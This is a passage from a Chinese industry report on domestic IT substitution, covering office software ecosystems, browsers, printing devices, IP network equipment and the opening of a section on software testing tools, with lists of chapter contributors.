随着各项工作的深入开展,我国自主的流版格式标准在电子文件信息安 全方面的作用越来越重要。下一阶段需关注的标准体系包括:以自主技术标 准为核心,完善在线办公软件标准体系;研究制定用户从微软生态向自主生 态无感过渡的评估指标;加快办公软件二次开发标准、OFD 软件功能标准等 重要技术标准的迭代更新,推进服务端的办公协作、安全防护等服务接口的 标准化,促进上下游厂商协同发展;加速在线办公软件厂商在UOF 、OFD 等自主版式标准上布局,推动电子证照、电子档案、电子司法卷宗、电子病 历等细分领域中OFD 标准子集的编制,比如电子证照文件技术标准、OFD 档案应用指南;基于OFD 标准的技术特点和产业优势,推动 OFD 标准在国 际相关领域进行深化应用,提升OFD 标准的国际化水平。 8.3.4联合生态伙伴打造综合性解决方案 当前,自主创新的网信产业已进入从“可用”向“好用”发展的阶段。 下一步,办公软件厂商要联合行业内的生态合作伙伴,打造符合用户需求的 综合性解决方案,构建良好的国产办公软件产业链生态环境。流式软件已累 计和300多家办公生态伙伴完成产品适配,产品适配覆盖协同办公、输入法、 邮件、语音识别等多个领域,形成了完整的解决方案,在产品不断升级的同 时,与生态链企业在低代码平台、校对服务方面创新融合推广。未来将继续 在档案、合同、项目管理、财务系统、金融证券领域与生态伙伴开展多场景 合作,拓宽服务边际,支持生态伙伴项目的落地与推广。版式软件已形成流 版签一体化办公支撑体系,下一步还可向产业链下游的图像处理、3D 应用、 地理信息轻量化应用等专业软件拓展融合。工业设计软件积极探索“制造行 业和工程建设行业的数字化转型方案”及“国产CAx 技术底座”的合作路径。 图像处理软件加强与芯片、操作系统、整机、人工智能等上游产业以及打印、 印刷等下游产业的协作,共同做大做强,推动产业发展。 本章主笔人员: 北京金山办公软件股份有限公司刘彬、马静 本章贡献人员(按公司名称拼音排序): 北京冠群信息技术股份有限公司薛馨枫、甘烈红 北京数科网维技术有限责任公司周兆峰、张文婷 北京亦心科技有限公司韦祖兴 广州中望龙腾软件股份有限公司汤曾斌、沈卓 永中软件股份有限公司梁勇、吴庆敏 友虹(北京)科技有限公司黄岩、宋涵 9.浏览器 9.1 掌握部分关键技术,努力拓展行业用户 9.1.1 基于开源代码发展相关技术 浏览器的核心技术包括网页渲染引擎、JavaScript 引擎、插件和扩展体 系、兼容性、数据安全等。国产浏览器厂商在渲染引擎和JavaScript 引擎的 研发方面基本直接采用开源社区的内核源码,虽不具备自研能力,但能够适 配X86 、ARM 、LOONGARCH 等主流 CPU平台。在插件技术方面,国产浏 览器自研支持NPAPI插件技术,能适应国内办公环境业务系统对流版签插 件的调用需求。在开源社区贡献度方面,国产浏览器厂商针对指令集架构和 操作系统内核做了大量适配工作,并将适配代码贡献给Chromium 开源社区, 逐步提升了对Chromium 开源项目的影响力。在安全方面,国内浏览器厂商 在网络加密协议、根证书库管理、云安全、数据加密、文件安全扫描等方面 具备了较强的自研能力。 9.1.2通过整体解决方案向行业拓展 随着应用 Web化发展趋势愈发凸显,浏览器已成为核心的应用平台访 问接口。浏览器的性能直接关系到办公系统的体验和效率。目前,企业级自 主浏览器正在以行业需求为导向,打造整体解决方案,希望通过这种方式将 应用范围从党政领域拓展到各个行业。 (1)浏览器与国密算法结合 在政策引导下,各单位国密改造的越来越旺盛。国内多家浏览器厂商 结合国密算法对浏览器产品进行了功能扩展和性能优化,希望通过完整的密 码安全方案为用户办公提供有力的保障,具体包括双内核同时支持国密算 法、国密协议/TLS 协议自适应机制、国密通道自动探测机制、支持《GB/T 38636-2020信息安全技术传输层密码协议(TLCP)》、 内置国内权威CA 机 构国密根证书、自主平台与Windows 跨平台兼容、云控国密管理配置、支 持国产芯片国密算法加速指令、全面适配国内主流 SSL VPN 网关、智能密 码钥匙、数字证书等。 (2)通过浏览器解决一致性问题 由于涉及应用系统,各行业对浏览器的需求虽然有共性,但也存在较大 的差异性。自主浏览器在行业领域的应用正在从单纯的业务接口平台向以浏 览器内核为基础的多形态产品解决方案,即泛浏览器生态方向发展。以金融 行业为例,浏览器作为衔接操作系统、外设、业务系统的枢纽,需要基于使 用环境和外设种类规避多种技术路线带来的兼容问题。同时,金融行业作为 国密应用改造重点领域,需要实现浏览器对国产密码算法和安全协议的完整 支持。又如能源行业, 自主浏览器要解决 “Wintel+ 自主”双轨运行期间业 务访问一致性的问题。对于航空航天领域, 自主浏览器要面对老旧应用的兼 容以及身份认证方式的适应性问题。 9.1.3 行业推广面临复杂的应用需求 随着自主生态的逐步完善,政策市场之外的通用市场需求逐步显现。部 分民营企业甚至外企开始采购自主产品。当前,自主产品已经逐渐进入“真用” 的阶段,浏览器厂商即将面对的是大量用户、海量应用在自主环境中稳定高 效办公的需求。这不仅仅是对浏览器厂商的考验,更是对整个浏览器应用生 态的考验。在实际项目中,浏览器厂商除了提供产品外,还需提供技术支持 服务,完成与应用、流版签、UKey 、网关等环节的兼容适配工作。在解决“真 用”问题后,后续势必会迎来更为深度、更为场景化的需求,如基于业务的 深度融合、数据运维、数据安全等场景。在用户办公应用场景复杂、终端计 算平台种类繁多的情况下,自主浏览器在各行业的推广面临一定的挑战。 9.2 投入、开源和生态是浏览器行业面临的共性问题 9.2.1 研发投入和国际影响力影响浏览器技术发展 浏览器属于平台基础软件,技术壁垒较高,研发投入大。国外相关产品 已经发展几十年,占据主要市场份额,技术和生态壁垒较高。国产厂商后起 追赶,技术攻关会遇到各种问题。 在研发投入和人才队伍方面,谷歌浏览器从2008年发展至今,研发成 本平均每年达到3亿美元,累计总投入研发成本超过30亿美元,推广成本 超过百亿美元。谷歌Chrome 和微软 Edge 各有数千人规模的浏览器研发团队 全球有上万名开发者通过Chromium 开源社区贡献浏览器代码,其中活跃开 发者1200人,月均代码增量120万行。反观国内,有能力基于开源代码做 深度开发的厂商只有少数几家,研发投入平均每年仅有5000万人民币,每 家企业平均投入研发人员30-120人,浏览器作为信息产业生态中不可缺少 的一部分,和其他行业相比,专业人才资源严重匮乏。 在开源社区和国际标准的贡献度方面,国外的Chromium 开源社区已发 展多年。Chromium 通过开源社区凝聚了各方面技术人才和上下游生态厂商 共同参与浏览器的技术变革,保持在众多浏览器中的领先优势。我国开源软 件产业处于起步阶段,还未形成国产浏览器开源社区。相应地,Web国际标 准组织中谷歌、苹果、微软、Mozilla 等国际厂商话语权最大,国内浏览器 厂商较少参与国际标准的制修订工作,对标准的影响力有限。 9.2.2 生态复杂导致兼容性问题突出 从技术的角度看,浏览器自身的复杂度日益增加,行业壁垒较高,而我 国相关的产业生态处于起步阶段,开发者处于相对封闭的环境中,导致解决 方案在技术实现上无法彼此兼容。从行业本身的角度看,国内浏览器厂商在 前一阶段把主要精力放在产品迭代、市场布局、建立标杆案例等目标上,处 于单兵作战的状态,没有形成合力。另外,浏览器厂商与各生态厂商虽然不 断推进兼容互认适配工作,但仅停留在初级层面,并没有深入研究形成整合 解决方案。从应用的角度看,目前浏览器的应用生态较混乱,基于浏览器的 B/S模式应用软件开发过程缺少统一的开发标准和接口规范,导致 B/S 模式 应用软件存在重复开发、版本混乱、互不兼容、难以维护等问题,且各类应 用插件难以对接和调用。从用户的角度看,前一阶段的自主创新和替代工作 主要集中在基础设施层面,对于自主浏览器的要求不高,往往是能装能用就 行,缺少联合解决方案。 9.2.3 应用场景复杂增加了迁移适配难度 虽然 IE6/7/8已经有很多年的历史,但不可否认其至今依然没有被淘汰。 一些机构仍然使用 Windows 操作系统,现有相当部分业务系统是基于IE 内 核开发并需要依赖ActiveX 插件来完成特定的操作。然而,自主平台不具备 IE内核,无法支持这些业务系统正常运行。这种情况在金融、军工等行业尤 其普遍。同时这些业务系统开发时间较早,客户已无法获得原开发商的支持, 迁移难度相当大,而重新开发业务系统则面临风险高、周期长、成本高等各 方面问题,导致不能在短期内迁移到自主平台的问题。 此外,为满足政企工作专用浏览器需求,企业提供了收费版自主浏览器 软件,即厂商在通用浏览器软件的基础上增加了相关应用、安全、可控和数 据防泄露等安全和管理功能,并提供技术支持和服务。为支撑上述功能,浏 览器厂商需要投入大量开发资源并及时更新内核版本。在此背景下,免费的 商业模式并不能支撑浏览器产业长远发展。由于付费的浏览器商业模式并未 完全被客户接受,这在一定程度上阻碍了浏览器产业的可持续发展。 9.3 三管齐下,促进浏览器产业发展 9.3.1 确定产业发展思路 目前,国产化 CPU 指令集有5种、操作系统有近10种,各种商业化定 制开发的业务应用系统不计其数。由于缺乏规范引导,产业生态混乱,导致 产品开发适配、应用系统集成部署过程中存在着兼容性、稳定性、易用性、 安全性等一系列问题,增加了应用系统开发、集成、维护、升级、扩展的难 度和成本。只有通过构建规范、统一接口,才能实现产业伙伴的协同互助。 因此,要尽快确定浏览器产业发展思路,制定统一的技术和产品标准,形成 良性迭代,最终具备技术上的自主能力。 9.3.2加强内部生态协同 浏览器的技术复杂度高,即便谷歌浏览器也在利用Chromium 开源论坛 的形式汇聚人才和代码,以完善其产品能力。因此,国内相关单位需要协同 作战,逐步构建浏览器产业的内部生态体系,保证产品的协同性和兼容性。 一是要通过开源社区汇聚人才,支撑核心技术快速发展;二是以技术标准为 纽带,探索建立协同发展机制,通过联合攻关等方式共同解决技术难点;三 是加大投入,以技术创新和成果转化提升产品成熟度,进而牵引产业发展。 9.3.3 加强周边生态配合 当前自主平台 Web 生态尚未完全成熟,在 CPU 、操作系统、流版签、 数据库和中间件等各个节点上都存在多路线、多品牌并存的情况。这对浏览 器的快速发展造成了额外的困难。面对这一问题, 一是要针对具体应用场景, 由浏览器厂商牵头,联合相关的基础软硬件和应用软件厂商,共同探索解决 技术异构导致的兼容问题。二是以浏览器标准为基础,加速办公套件在浏览 器上运行性能的优化,与业务系统、流版签软件、业务插件/扩展、身份认 证设备等产品整合为自主创新的办公套件,为用户提供一站式便捷访问方案。 三是联合网关、Ukey、CA 等安全厂商构建密码解决方案,共同打造基于国 密算法的安全解决方案,助力国密改造应用和测评的快速落地。四是促进浏 览器产品与其他技术的协同配合,如与身份管理系统对接,形成以用户身份 为核心的精细化管理场景;与大数据平台对接,提供用户行为探针、应用状 态探针、业务数据探针,为安全运维提供支撑;与涉密/关键字识别系统对接, 对异常行为进行检测及阻断,形成密级文档保护解决方案,防止敏感文件泄 露;与终端管理软件对接,在文件的上传下载进程中调用其病毒鉴别能力, 进行安全环境检测;与企业云盘对接,形成文档安全访问不落地解决方案。 本章主笔人员: 北京海泰方圆科技股份有限公司王鹏、王丹、李博 本章贡献人员(按公司名称拼音排序): 奇安信网神信息技术(北京)股份有限公司田亮、刘晓健、李良杰 三六零数字安全科技集团有限公司田新超、郭建强、左建春 10.打印设备 打印设备是连接计算机主机的常见外部设备,具有结构复杂、技术难点 多、产业链条长、应用环境敏感、攻击面大等特点,其研发与生产涉及精密 机械、精细化工、高分子材料应用、精密光学、图像处理、激光扫描、自动 控制、微电子、静电学、软件等众多学科门类和技术。近年来,自主打印设 备在产品、生态和技术方面都取得了较大的进步,市场侧表现也呈现出良好 的上升态势,但在高端产品等方面仍然存在不足。 10.1 产品、技术、生态、安全协同发展 10.1.1 产品种类不断丰富,技术积累持续深入 从产品的角度看,国产自主打印设备的研发动力强劲,多款自研产品陆 续发布,在A4 黑白高速激光打印市场日趋稳固的同时,针对行业需求的订 制化打印设备(解决方案)也逐步丰富,如红黑激光打印机、金融自助一体机、 医用自助一体机等产品获得了相对广泛的市场认可度。 从技术的角度看,激光打印设备的核心技术主要涉及打印引擎、扫描引 擎、硬件控制板、软件和固件开发等方面。在打印引擎、扫描引擎、硬件控 制板方面,国内厂商已完全掌握A4 黑白激光打印,包括40PPM(Pages Per Minute, 每分钟页)高速打印技术,具备了基于龙芯等自主处理器的设计能力。 部分国内领先的企业掌握了激光打印机光路设计、高精度透镜模具设计加工、 激光扫描单元驱动控制等核心技术。在软件方面,国产驱动软件具备兼容性 高、使用友好、稳定性强、打印质量高和处理速度快等特点,能够解析多种 打印语言。 10.1.2 国产化适配稳步推进 打印设备在信息系统中运行时,需要应用环境提供打印组件、数据端口 等方面的支撑。因此,相关的软硬件厂商是打印设备生态链的重要组成部分, 打印设备的设计生产企业需要与国产的基础软硬件开展大量的适配工作。目 前,主流打印设备厂商已经完成了龙芯、飞腾、鲲鹏、兆芯等国产处理器, 以及麒麟、统信、中科方德、凝思磐石、华为欧拉等国产操作系统的适配和 验证,并为上游应用软件提供了软件开发包SDK 和服务接口API, 在扩展 国产打印设备的兼容性方面做了充分的准备。目前,国产打印设备已经完成 了与大部分国产化应用软件的适配和测试。日渐完善的生态链为国产打印设 备在重点行业领域的稳定表现提供了支持和保障。 10.1.3 安全属性不断增强 打印设备承担着数据的转化和展现任务,因此其安全问题需要给予足够 的重视。尤其是在连接无线化、网络化的趋势下,打印设备成为数据泄露的 重要隐患。近年来,相关厂商在打印设备的安全性方面持续发力,多项安全 增强技术相继成熟并发挥了实效。2022年,可信计算技术在打印设备中实 现了产业化落地并获得大面积推广应用。可信计算依靠静态度量与动态度量 相结合的方式,通过监控环境状态提高安全水平,在依赖管理软件进行安全 监控的同时形成了新的安全保障机制。基于TPCM(Trusted Platform Control Module, 可信平台控制模块)技术的安全增强型打印设备,在打印设备上实 现了主动免疫,极大地提高了打印设备的安全性。 此外,打印设备与PC 机之间的双向认证、打印信息传输加密和完整性 保护、固件升级防篡改、打印设备网络安全防护及隔离、用户身份识别等安 全技术也在自主打印设备中得到了广泛应用。部分头部企业还开展了打印全 生命周期的安全研究,对典型应用环境下的“风险场景-风险点-脆弱性- 应对策略”进行了全面的梳理和分析,并依据不同需求等级给出了相应的安 全策略框架。 10.1.4行业应用持续深入 根据智研咨询发布的《2022-2028年中国打印机行业市场现状分析及未 来前景分析报告》,2021年中国打印外设市场出货量为1845.2万台。其中 激光打印机出货量约为941.6万台,占总出货量的51%,激光打印是主流的 打印产品应用形态。 党政是激光打印机的主要应用领域,激光打印机保有量占比达到了 25%,约为1125万台“。目前,地市级以上党政内网打印设备的替换已基本 完成。未来打印机在党政领域的应用范围将实现向外网的横向拓展和向地市 级以下行政机构的纵向拓展。 金融、石油、电力、电信、交通、航空航天、医疗、教育等重要行业是 激光打印机应用的另一重要领域,其保有量占比约为40%。在重点行业应用 中,2022年金融行业的替换力度较大。银保监会生态适配中心的建设为自主 打印设备在金融行业的推广起到了引领作用。中、农、工、建、交已完成了 第一批自主打印设备的集采招标。其他商业银行和小型金融企业预计将采用 类似的模式,逐步实现打印设备的替换。通信、交通、教育、医疗等相关行 业打印设备的替换有序启动。 在涉密应用方面,安全增强型打印机已不再局限应用于涉密网,在非涉 密办公环境下逐步获得了应用。 需要关注的是,2023年起将不再组织打印设备的产品入围测试,而是 通过制定行业统一标准的方式,为国内打印设备厂商提供公平竞争和良性发 展的商业环境。 8 https://mp.weixin.qq.com/s/p6cvjCjTCspc6Izw01-rqA 10 .2高端产品的空白是影响市场拓展的重要问题 10.2.1高端产品仍有空白,核心技术有待突破 2022年既是对国内打印设备企业耐力的考验期,也是企业进入下一赛 程的蓄力期。 一年来,国内主流厂商增加研发投入,夯实技术积累,实现了 关键领域技术的突破和高端产品的产业转化。主流打印设备厂商在 A4 黑白 高速打印设备领域亮出了中国产品,为在更广阔的市场领域与国外产品同台 竞争奠定了基础。然而,国产打印设备在大幅面、高性能、彩色打印、多功 能一体等高端机型方面仍然是空白。实现从A4 到 A3 、从单色到彩色、从单 一功能到多功能一体机的产品跨越,产业界需要突破多项关键技术,如A4 和A3 全彩色打印引擎的开发、基于国产SoC 的主控板卡和数据控制固件研 发、以及彩色图像处理软件和基于国产操作系统的打印/扫描驱动软件开发 等。 10.2.2 高端产品的供应链严重依赖国外 目前国内基于A4 黑白激光打印机的供应链框架初步建立,但受制于国 外的专利和技术封锁,以及国内技术积累不足、高端市场需求拉动乏力、产 业链整体规划和布局不够等因素,我们在大幅面及高速、彩色、多功能一 体等高端打印设备的供应链方面仍未形成完整的体系。具体来说,国内厂商 已围绕注塑、电机、钣金加工等方面形成了相对安全的供应链,但在芯片设 计生产、光学组件生产等方面仍依赖进口。除打印引擎外,扫描引擎(包括 图像传感器、模拟前端芯片、马达、马达驱动芯片、机械结构等核心关键 零部件)的产业链也不成熟。部分国内厂商已初步掌握了基于CIS(Contact Image Sensor,接触式图像传感器)的A4 幅面低速扫描引擎的设计开发, 但 CIS 图像传感器中的关键原料仍需从国外进口。国内在基于CCD(Charge Coupled Device,电荷耦合器件)的高品质扫描引擎技术和部件生产方面仍是 空白。 10.2.3专有协议限制了高端产品安全性的提升 随着高级打印设备的功能越来越复杂,其攻击面已经相当于一台小型服 务器。打印设备有其独特的脆弱性,如需开放专有端口,通过专有协议接收 和处理专有打印语言,这导致针对打印端口、协议和打印语言的攻击越来越 多。应对打印设备的脆弱性,需要厂商对所采用设备管理协议(如SNMP 、 NPAP 等)、网络打印协议(如RAW、IPP、LPR、SMB 等)、打印控制语 言 ( 如 PJL 、PML等)、页面描述语言(如PostScript 、PCL等 ) , 以 及 打 印设备专有部件(如LSU 、OPC等)等进行深入的理解和分析,而这些协 议或相关的标准基本上都由国外制定,要实现深层次的安全保障并非易事。 10.3 提升产品与服务质量,迎接更大的市场空间 10.3.1 增量与存量市场叠加,市场预期看好 2022 年,国产化打印设备市场进入了持续发展的阶段性间歇期。地市 及以上级别党政机构打印设备的国产化替代基本完成,乡镇级替换计划即将 出台,重要行业的分类替换策略初步明确,市场强势启动在即。预计未来5年, 打印设备厂商将迎来更加积极的市场反馈。 此外,存量市场更换周期的叠加红利也被看好。未来5年,前期完成替 换的存量打印机设备会陆续进入更新替换期。以激光打印机为例,根据IDC 数据°显示,2021年中国激光打印机出货量942万台,激光打印机寿命一般 在5年左右,从加总2017-2021年的5年累计出货量推算,中国激光打印机 市场现有存量大概在4500 万台。据此计算,未来5年,仅存量打印机的更 9 https://mp.weixin.qq.com/s/p6cvjCjTCspc6Izw01-rqA 换市场将达到900万台/年左右。此外,4500万台激光打印机年消耗硒鼓耗 材数千万个,也将给相关厂商带来巨大的市场空间。 10.3.2产品与服务并举,开拓新的盈利模式 基于目前打印设备国产化发展现状,在技术、应用和服务层面持续创新, 应该成为打印设备厂商新的盈利之路。在技术创新方面,国内厂商可以通过 低功耗定影、碳粉连供、耗材改进等技术,持续降低产品的生产和使用成本, 拓大利润空间。在应用创新方面,国内厂商应继续拓宽产品应用场景的覆盖 面,通过满足不同行业、不同群体特殊需求,延展市场空间,如通过小程序 满足用户移动办公场景下的打印需求,支持多种身份识别模式的激光打印机、 便携化打印机、家用化打印机等多种产品形态,提高各种场景下的安全性等。 在服务创新方面,国内厂商可以通过打印设备租赁、会员租赁、文印服务管 理等,围绕服务打造新的盈利模式。此外,产品的安全性、适配兼容性、易 用性也是国内厂商的努力方向,深入到国内各类用户的应用场景中,满足个 性化应用需求,是国内厂商的必修课之一。 10.3.3 坚持走自主创新之路,为可持续发展创造条件 自主创新是各产业节点可持续发展的必由之路。打印设备企业应更加关 注市场的细分和产品的创新,注重技术能力的积累和知识产权的管理,同时 注重复合性人才的培养,为企业注入持续自主创新的活力。 一方面,要构建 更加安全的产业供应链,为打印设备新产品的研发和生产提供同步的产业链 环境,对于高投入、高风险的核心部件从资金等层面进行布局,消除核心部 件的供应链节点障碍。另一方面,要建立应用环境的适配标准,针对CPU 、 操作系统和上游软件产品制定统一的适配标准和接口标准,探索“一个接口、 多个平台、多个版本”的适配机制。第三,要建立行业人才培养机制,整理 行业人才知识结构框架、设计行业人才专业培训课程、建立行业人才考核与 流动机制,为本行业的人才需求提供持续保障。 本章主笔人员: 北京辰光融信技术有限公司侯海波、张志龙 本章贡献人员(按公司名称拼音排序): 中国软件评测中心刘翔宇、马世民 11.IP 网 络 11.1 自主 IP 网络构筑关键信息基础设施 11.1.1 重点行业 IP 网络基础设施正加速替代 自主网络设备支撑国家网络基础设施试点,涉及到数据中心、云平台、 办公网等网络改建和新建。目前各行业开始全面推进国产化建设,如金融、 税务、运营商、央企等,各行业的主要信息化逐步向国产化迁移。此外,自 主网络基础设施在数据中心和办公园区网络形成整套替代方案。从2020年 开始,各云平台厂家在基于私有云部署方面基本会选定国产化平台作为主要 的对接方向。国内主流云厂家均有相关合作对接的国产化网络产品厂商,同 时自身平台基于国产化计算平台,已经具备构建基于全国产化的IAAS 层能 力。随着各个云平台完成国产化替代,数据中心自主网络设备已具备与国产 化云平台对接的能力,在部分行业试点项目中达到业务向国产化基座迁移的 目标。自主数据中心产品已经在部分领域形成规模应用。在行业侧,以运营 商为代表的重点行业持续调研替代的可能性,从中低端交换机产品开始,逐 渐完成国产化并增加国产品类的入围占比。 11.1.2依托自主创新 IP 网络新技术,行业网络稳步升级 互联网行业创造开源与白盒新商业模式。在数据中心网络领域,国内外 大型互联网公司,因其业务对设备的需求量大且自身技术能力较强,具备产 品定制条件。具体模式是:设备商、代工厂等提供标准交换机白盒产品,由 互联网公司利用 SONIC 开源系统研发上层软件,两者结合满足企业自身业 务需求。传统设备厂商如思科、华三、迈普、锐捷等都推出开放性白盒解决 方案。互联网公司与设备供应商充分利用各自优势,将开源与白盒设备深度 融合,打造有市场竞争力的高性能产品,形成新的商业模式。中、小云服务商、 电信运营商及企业客户,由于成本压力较小、设备需求量不大、研发实力差 距及应用场景差异等原因,白盒化趋势演进较为缓慢。 设备厂商自研芯片渐成新趋势。自研芯片动机一方面是商用芯片优先满 足大规模场景需求,对于关键重点小规模领域覆盖度不足;另外一方面是未 来产品创新、成本控制、供应链安全和性能提升等因素成为竞争新热点。所 以越来越多的网络设备厂商结合自身特点设计数据转发芯片,具体包括交换 ASIC 芯片、NP 芯片、FPGA 芯片等。可以预见,未来自研高性能数据转发 芯片是突破自主可控网络应用限制,从网络大国到强国的必然选择和必经之 路。 DPU 代 替 SmartNIC (智能网卡)正在以惊人的速度崛起,成为整个行 业关注的重点。DPU 的英文全称是 Data Processing Unit(数据处理器),紧 密围绕数据中心场景应用而打造。SmartNIC局限于网络流量卸载, DPU 进 一步将存储、安全和虚拟化等工作从CPU 卸载。通过DPU 功能卸载提升算 力基础设施的效率,减少能耗浪费,进而降低成本。传统设备厂商也在积极 投入DPU 研究并发布了相应产品。从趋势上看,云计算大厂对数据和基础 设施核心技术把控非常严格,争相投入数据中心架构未来变革,所以头部厂 家一定会坚定地自研 DPU, 而企业市场可能是DPU 的一个核心机会。另外, DPU 在当前发展阶段也存在技术路线之争。最后,DPU 是数据中心架构变 革的必然产物,将会在云计算3.0 时代发展中发挥重大作用。 11.2 自主数据通信芯片制约高端网络设备研制 国内通信芯片用量小、成本高,部分芯片与国外存在代差。芯片全流程 (设计、制造和封测)涉及费用非常高、开发周期长,但通信芯片却用量小(相 对于通用芯片)、成本高,导致通信芯片厂商和设备厂商财务负担重,制约 企业发展。最终结果是国内部分通信芯片与国外相比性能规格弱、有代差。 11.2.1中央处理器 (CPU) 中央处理器在数据转发处理方面的性能较弱。网络设备中CPU 主要用 于两个平面: 一是系统管理和控制;二是数据转发处理。目前通信CPU 主 要来源于国内服务器 CPU, 多以通用计算型为主,利用多核和高频率可满足 网络设备管理控制和中低端数据转发的要求,并且随着服务器CPU 性能持 续升级,性能有望进一步提升。但国内服务器CPU 在高端设备领域数据转 发处理性能上还比较弱,主要原因是通用CPU 不具备通信加速部件,如流 预处理、加解密、硬件报文缓存管理等。所以,通用CPU 仅能作为中低端 设备数据转发芯片使用。同时在相同处理性能的前提下,服务器CPU 价格 也不具备成本优势。 11.2.2交换芯片 (ASIC) ASIC(Application Specific Integrated Circuit)即专用集成电路,是指应特 定用户要求和特定电子系统的需要而设计、制造的集成电路。我国专用集成 电路芯片与国外相比存在较大差距。ASIC 芯片可满足中低端交换产品需求, 但是与国外芯片相比在品类多样性、大容量、可编程特性等方面还存在差距。 特别在专用集成电路芯片领域,生产和制造工艺方面需要7nm 或 5nm 制程, 也存在较大差距,同时产业生态也有待进一步完善。 11.2.3可编程逻辑器件 (FPGA) 可编程逻辑器件存在2-3代差距。国内FPGA 厂商基本实现了55nm、 40nm 和 2 8nm 工艺平台布局和自主FPGA 产品稳定量产,但与国外头部厂 商Xilinx 和 Intel 相比,在逻辑规模、性能和工艺方面,仍存在2-3代差距。 对应的 EDA 开发工具也需在自主创新方面更进一步。 产业链内循环未充分运转,上下游相互制约。在国内客户对网络设备 高性能、高集成度、低功耗、低价格的要求下,驱动网络设备厂商进一步采 用国外芯片以提高产品竞争力。这种模式不利于国内芯片规模商用和进一步 成熟。同时,网络通信行业技术更新快、生命周期短,进一步影响市场的总 体收入预期,无法快速收回投资成本。企业难以支撑在芯片和网络设备开发 上的持续高投入,造成在通信尖端领域,国内与世界领先水平的差距很难缩 小。 由于我国芯片制造工艺还比较落后,追赶难度较大。随着网络设备技术 规格不断提高,通信芯片需要采用更加先进的制造工艺(大多都在14nm 工 艺以下,部分芯片甚至需要5nm) 来满足高集成度、高规格、低功耗的要求。 芯片生产在原材料、代工方面存在交付周期长、价格高等瓶颈;在贸易摩擦 大背景下还存在生产断供的风险,致使网络设备厂家对于选择自主芯片更加 谨慎,影响产业正常发展。 11.3 自 主IP 网络纵深发展需突破产业瓶颈 11.3.1打造自主先进的IP 网络基础设施 组建产业联盟打通芯片产业链。针对产业链芯片制造工艺、架构不先进 等问题,需要上下游企业组建产业联盟,将自主网络设备商与上下游企业密 切合作,形成从芯片设计、制造到网络设备研制,再到最终客户应用的完整 产业链。从制度、政策、技术、标准以及奖励等方面,推动芯片企业在设计、 制造、封装、测试、装备、材料、设计工具等各环节实现核心关键技术突破。 根据最终客户场景及时更新和适配产业链配套关系,打造良性共享生态。 基于完善的芯片产业链打造自主先进的网络设备,满足行业差异化诉求。 重点打造交换芯片( ASIC) 、NP 、FPGA 等高速数据转发芯片,满足日益 增长的流量、带宽需求。同时,针对工业互联网、运营商承载网、物联网等 细分领域,满足对网络有更高的时延、丢包、可编程性等需求。通过确定性 网络技术、网络切片技术与算力网络技术深度融合,打造超低时延、云网融合、 按需服务等高品质的网络基础设施。由此,自主网络设备将会覆盖从核心到 接入全系列,从数据中心到企业园区全场景,从党政金融到工业民生全行业 的完整解决方案。 11.3.2 以产业政策和标准为依托推动产业生态建设 政策牵引扩大需求,加速产业链内循环。通过政策牵引扩大最终客户应 用需求,引导树立政府和国有企事业单位带头使用自主产品的风向标,发挥 重要机构和行业旗帜作用,进而促进产业应用和创新。让芯片企业和网络设 备企业获得回流资金,以持续投入产业技术的创新。推荐政企事业单位在采 购网络设备时向国产网络设备倾斜,优先选择性能相差不大的中低端国产网 络设备。研究制定精准的扶植政策和强有力的激励创新政策,制定芯片和网 络设备在自主产品方面减税政策,推动从芯片到网络设备,再到应用的完整 产业生态内循环。 充分给予国内芯片和自主网络设备产业支持,逐步增强产业生态。各部 门及各行业对国内芯片方案给予支持和广泛应用,开拓足够的市场空间,以 应用促发展、以应用促成熟。在业务允许范围内适当降低自主网络产品进入 的门槛和限制。在不允许降低的场景中,通过试验网的方式,承担部分业务 流量,逐步增加流量压力,从而使厂商可以快速迭代,满足需求、解决问题。 引导网络设备采购量最大的运营商、互联网公司,对于项目招标采取分层分 类的管理办法,避免对网络产品要求的指标虚高,保障自主创新的产品实际 投入使用。只有通过大量的使用,才能在功能性能上发现不足,不断完善和 迭代,形成使用-改进-再使用-再改进的小步快跑的良性循环模式,逐步 实现国产化替代。 完善网络产品相关标准,促进行业应用快速落地。网络产品仍需以成熟 的国内和国际标准为基础,充分兼容现有网络底层技术架构。相关机构应发 挥自身优势,联合各企业联盟组织,建立和完善网络产品的测试大纲和技术 标准、测试/测评规范、评分原则等,统一服务入口,统筹服务资源。网络 标准组织也应积极推动各成员企业加速相关网络标准的编研工作,早日实现 自主网络产品有标准可依,促进自主网络产品在行业应用的快速落地。 本章主笔人员: 迈普通信技术股份有限公司林茂、罗向征、陈丽莎 12.软件测试工具 软件测试工具按测试类型和方法可分为静态分析、单元/集成测试、半 实物仿真、数字化仿真、功能自动化测试、性能测试、动态模糊测试、组件 风险分析、测试管理等类别,功能上涵盖软件功能、性能、可靠性、安全性 等多方面测试,可用于发现程序错误、衡量软件质量。当前,国内软件测试 工具大部分市场被国外厂商占据,自主创新的测试工具产业刚刚起步。2021 年,软件测试类工具首次写入工信部《软件和信息技术服务业发展规划》, 作为开发支撑软件定位为关键基础软件,与操作系统、数据库、EDA 工具 等并列。 12.1 国内软件测试工具市场不容乐观 12.1.1 软件测试工具严重依赖国外,有断供风险 2000 年,国外测试工具开始进入国内市场。2002 年,英国LDRA 软件 测试套件首次进入中国航天市场。随后,Parasoft、Synopsys、Checkmarx、 Vector等国外厂商纷纷于2007年至2012年通过国内代理商开拓了军工、金融、 汽车、通信、互联网等行业。 目前,上述领域80%的市场份额仍然由国外 厂商占据。此外,在部分需要支持国际标准认证的行业,软件测试工具基本 被国外厂商垄断。例如,国产测试工具鲜有支撑适航认证标准 DO178C 的。 近期,国外的软件测试工具厂商已经开始针对我国关键行业领域进行出口管 制。因此,软件测试工具领域面临较为严重的断供风险。 12.1.2 国产软件测试工具产品覆盖较全,但总体水平相对落后 国外测试厂商起步于20世纪80年代,产品成熟度高,产品矩阵丰富。 由于缺少国家政策引导和市场支持,国产软件测试工具的研发和应用曾经一 度陷入低谷,直到2016年前后才有国内厂商陆续发布各类工具。目前,国 内软件测试工具厂商有40多家,从业人员估算4000多人。虽然起步晚,经 过7年的市场打磨,国产软件测试工具在类别覆盖面上基本达到了与国外相 当的水平,个别厂商在软件质量、软件安全和EDA 测试工具方面均有布局, 但产品的成熟度有待提升。与之相对应,国内企业在该领域的标准话语权、 知识产权、市场占有率、人才梯队等方面也处于劣势。 12.2 国产软件测试工具产业发展面临诸多挑战 12.2.1 国产软件测试工具大多数处于中低端水平 国内软件测试工具行业起步晚,部分测试工具品类如单元测试工具,形 成了群体技术突破,整体水平接近国外产品。但是,大部分国产软件测试工 具仍处于中低端水平,与国外高端产品存在较大差距。如国产静态分析工具, 